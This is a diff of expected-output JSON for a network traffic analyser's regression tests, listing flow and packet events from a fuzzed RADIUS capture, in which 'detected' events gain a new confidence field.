 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":600000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1528998260755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528998260755,"pkt":"AAAMB6xAABRO+4rqCABFAALbIUZAAP8RAAAKBkAexuIZNXIQBxQCxwAAAZYCv2ld+75N6br3Aseqn5DA044aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2N2hbIql0ATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNVctNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1YWE5MjI1YiwgNWIyMmE5NWEvZTA6NWY6NDU6ZTA6MDk6NWYvMjM4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1qBgAAAAZRBDU2TzoCAQA4AzAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjYjExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaQQAAV8gLClS8c3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAgFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQQAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS7YR7iU74FmJPxnRlVfzqUQ=="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260755,"flow_last_seen":1528998260755,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998260755,"l3_proto":"ip4","src_ip":"10.6.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1528998260831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528998260831,"pkt":"ABRP+4rqcNuYVcUnCABFAAClC7JAAPwRSFTG4hk1ClJAHgcUchAAkW2jC5YAiay3x5utrN9ef0\/5StJEFS4BNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWUvZTA6NWY6NDU6OTA6MDk6NWYvMjM4Tw4BAAAMVwwAAAwBf\/xQEkJeR7D8c3a4+60+qxnUicM="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998260831,"flow_last_seen":1528998260831,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998260831,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.82.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01226{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":280,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"ts_msec":1528998260959,"pkt":"AAAMB6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":280,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690}
 00570{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":281,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2056,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"ts_msec":1528998261024,"pkt":"ABRX+4rqcNuYVcUnCAhFAADAC7dAAPwRSDTG4hk1CgxAHgcUchAArEQCA5cApOyxS9lHKp\/iE8OGfXn5m7UBNTAzMTE0ODAwODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4EiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8HBAEABwBQEvCuKaRJ36jDL+AkcQNYHtM="}
@@ -440,43 +440,43 @@
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":283,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":145}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1528998279797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"ts_msec":1528998279797,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIUlAAP8RAAAKDEAexuJQNXIQBxQClwAAAZkCj3rtQEtjvnzCegZr\/ks\/YsIaCgAAJQAOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIq2HATUwMzExNDgwNDMyNjA4NTg2QHNsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TNWMtMWQtZDktNTMtMGMtOWIeJTAwLWE3LTQyLWQwLWUwLTAwOlaNcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDA4N2E5MjI1YiwgNWIyMmE5ODcvFWM6MWQ6ZDk6NTM6MGM6OWIvMjM5BASsFAEQIA5WWldDMlRlc3RMYWIaDPYAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TwoCAAAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyCoKU3RhbmRhqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998279797,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528998285403,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1528998285403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528998285403,"pkt":"ABRP+4rqcNuYVcUnCABFAAClDBBAAPwRR\/bG4hk1DgxAHg8UchAAkVlTC5wAid6Vm2Prh8ff1igjujrPQY0BNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWPjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmELODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5Tw4BAAAMFwwAAAwBf\/xQEvWoCrn3KdnMpOYKRlABwJ8="}
 00569{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":293,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"ts_msec":1528998285592,"pkt":"ABRP+4rqcNuYVcUnCABFAADADBdAEPwRR9TG4hlFCgxAHgcUchAArDMCA50ApI8fGqCVnysbmexp5ciWlfwBJTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5ODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5EiIzMjc2NCBTqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":293,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1528998307737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528998307737,"pkt":"ABRP+4rqcNuYVcUnCABFAADhDH5AAPsRSEzGBwk1CgxAHgcUchAAzRApC54AxbiGAVeQd4nw9IQcbiUA5zoBNTAzMTM0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3T0oBAnZIFwEAAAEFAAD4l2tdy6yk\/88l9cpE8l40DAUAACRoRug2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1528998308061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528998308061,"pkt":"AAAMB3BAABRP+4rqCABFAALHIU9AAP8RAAAKDEAexuIZNXIwBxRDswAAAZ8Cq9PofZmSNOhQyNOgaRsyJ1QaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNYUjEwGgkAADghDQMwNxZbIqmjATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yaS5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b243aUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkczEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NTIvZjA6Nzk6JQA6ZDE6N2Q6MzcvMjM3BAasFAEQIA5WWldDhFRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAADqGOBIENmf79hbM4GZs1ZYAwIAIJdiOR0aFAC4V8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhBhAFfICwpUZXN0IExhYhoJAABXyA8DMRoKpwBXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaHJlY3QaDAAABYNHBsBQSplQEuURqTNatQDGcJFc00xUIbY="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00720{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":297,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":16640,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528998308249,"pkt":"ABRP+4rqcNu2VcUnQQBFAAEwDINAAPsRR\/jG4hk1CgwlAAcUchABHKZIAp8BFMKP3L7bmNggOPWkTIavpgoaCwAAV8gbBVNQQxpuAAABNxA0723Z5fHoC0l+gadvadgzfaSzCz27rPwxopk71TEDK1VIm8mW\/vsFxUsHy2TxysAjZO8RNM3E07NOswLZR1Yjduj2RuApthb0mlkqWQZZpjfg4Vd1eYt2TqpojJTwm8thaNHCskFYATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLiUAYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhOTUyL2YwOjc5OlAwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFeVBDTwYDAgAEUBIoTJCJ2HxVvdUlAOn56UH9"}
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":297,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":16640}
 01291{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":298,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528998308483,"pkt":"AAAMB6xAABRP+4rqCAAkAALbIVBAAP8RAAAKDEAexuIZNXIQBxQCxwAAAaACv\/i0glgkXqR4abyMOyu1FuUaCgAAV8gOBFVTGgwAAFfIDSUAaWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqmkATUwMzExNDgwNDMyNjA4NTg2QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TNWMtMWQtZDktNTMtMGMtOWIeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpLi1zZXNzaW9uLWl0PTEwZmYxMGFjMDAwMDAwZDFhNGE5MjI1YiwgNWIyMmE5YTQvNWM6MWQ6ZDE6NTM6MGM6OWIvMjQwBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABFABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODA0MzJoMDg1ODbWd2xhbi5tbkM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhdWQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZCUAbURpcmVjdBoMAAAFgwdbwFBKmVAS3DaqxzVlY8YVdJMYTWA\/Jw=="}
 00180{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":298,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048}
